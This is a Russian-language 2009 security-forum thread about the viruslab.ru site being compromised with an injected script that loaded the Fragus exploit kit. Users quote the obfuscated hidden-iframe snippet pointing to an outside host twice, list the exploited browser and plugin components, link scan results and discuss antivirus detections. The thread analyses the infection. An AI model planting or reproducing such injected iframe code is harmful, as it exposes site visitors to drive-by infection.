viruslab.ru - заражен?

[Пит 15]

сосед зашёл, получил это:

[DVi 30]

Не удивительно, учитывая наличие вот этого кода в центре страницы:

<script>document.write('<ifr'+'ame height=\"0\" width=\"0\" style=\"display: none;\" src=\"http://gali'+'yas.c'+'n/show.php?s=0be7'+'fb3bca\"></ifr'+'ame>');</script>

[Пит 15]

Это значит что панды в России в опасности?

[vaber 350]

Мухаха!!

Реално инфекченный сайт:

<script>document.write('<ifr'+'ame height=\"0\" width=\"0\" style=\"display: none;\" src=\"http://gali'+'yas.c'+'n/show.php?s=0be7'+'fb3bca\"></ifr'+'ame>');</script>

Это iframe, ведущий на страницу с эксплоитом.

А там полно вкусностей:

MDAC

directshow

pdf - util_printf, Collab.collectEmailInfo и collab_geticon (будут заражены все у кого акробат менее чем версии 9.0 внезависимости от используемого браузера)

swf

aolwinamp

snapshot

spreadsheet -вроде в прошлый вторник майкрософт выпустил патч

Собственно бинарник:

http://www.virustotal.com/ru/analisis/2c9a...e352-1250730484

на текущий момент:

http://www.virustotal.com/ru/analisis/2c9a...e352-1250777968

Pdf-ка с эксплоитом:

http://www.virustotal.com/ru/analisis/f5a4...d093-1250778731

Флешка:

http://www.virustotal.com/ru/analisis/73bc...bad9-1250780189

[Юрий Паршин 330]

Добавили детект скрипта как Trojan-Downloader.JS.Iframe.bpe. Это для тех, кто любит отключать эвристику в WebAV)

[vaber 350]

и еще добавлю:

Кому интересно, что это за sploit-toolkit, которым инфицируют посетителей viruslab.ru:

Тулкит называется FRAGUS, российская разработка, появилась в июле. Цена - 800$

http://evilfingers.blogspot.com/2009/08/fr...rk-in-wild.html

З.Ы. Не воспринимать как рекламу

[Zilla 340]

Так а что будет если зайти на сайт без антивируса?

Цена - 800$

Это цена за вирус что-ли?

[Motley 30]

Ничего ровным счётом Я только что без антивируса заходил.

[Skorpion 55]

и еще добавлю:

Кому интересно, что это за sploit-toolkit, которым инфицируют посетителей viruslab.ru:

Тулкит называется FRAGUS, российская разработка, появилась в июле. Цена - 800$

http://evilfingers.blogspot.com/2009/08/fr...rk-in-wild.html

З.Ы. Не воспринимать как рекламу

по данной ссылке заражение.

+после этого вот это стало появляться:

[Burbulator 146]

по данной ссылке заражение.

kis2010 не видит

[Skorpion 55]

20.08.2009 23:58:47    Вредоносный HTTP-объект <http://www.anti-crimeware.ru/exp/adjs.php?n=659423313&what=zone:3&target=_blank&exclude=,&referer=http%3A//www.anti-malware.ru/forum/index.php%3Fs%3Dcec0f04941ee8262607b77deda8f3f8b%26act%3Dpost%26do%3Dedit_post%26f%3D2%26t%3D9263%26p%3D78982%26st%****: обнаружено: вирус 'HEUR:Exploit.Script.Generic' (модификация).20.08.2009 23:52:04    Вредоносный HTTP-объект <http://evilfingers.blogs***.com/2009/08/fragus-new-botnet-framework-in-wild.html//fragus-new-botnet-framework-in-wild>: обнаружено: вирус 'HEUR:Exploit.Script.Generic' (модификация).

Если ява скрипт в браузере отключаем, аллертов больше нет

[Skorpion 55]

Случайность?? Вирлаб Касперского намудрил чёта?

[Deja_Vu 366]

kis2010 не видит

убрали уже пару часов назад

[Skorpion 55]

убрали уже пару часов назад

Обновление не помогло, только откат не предыдущие

[priv8v 960]

Это цена за вирус что-ли?

За эту связку эксплоитов. Бинарник, загружаемый связкой, может быть любым.

[vaber 350]

Это цена за вирус что-ли?

за exploit-toolkit. Троян, который заливали, где-то на порядок меньше.

Ничего ровным счётом smile.gif Я только что без антивируса заходил.

Эксплоит уже убрали и по указанному адресу на текущий момент ничего не отдается.

[Motley 30]

А вот теперь включил антивирус

[vaber 350]

Это детектирование обфусцированного iframe, который вел на Fragus, пакет эксплоитов.

[Zilla 340]

Дк а кто их в их сайт эту фигню впихнул? похекали шоле?

[Umnik 997]

Skorpion

Вы используете не релизную версию.

[Юрий Паршин 330]

Skorpion

Вы используете не релизную версию.

Дополню: WKS6MP4 RC в настоящий момент обновляется с сервера tim1 - это тестовый сервер, поэтому фолсы вполне возможны - на боевые сервера эти апдейты роботом пропущены не были.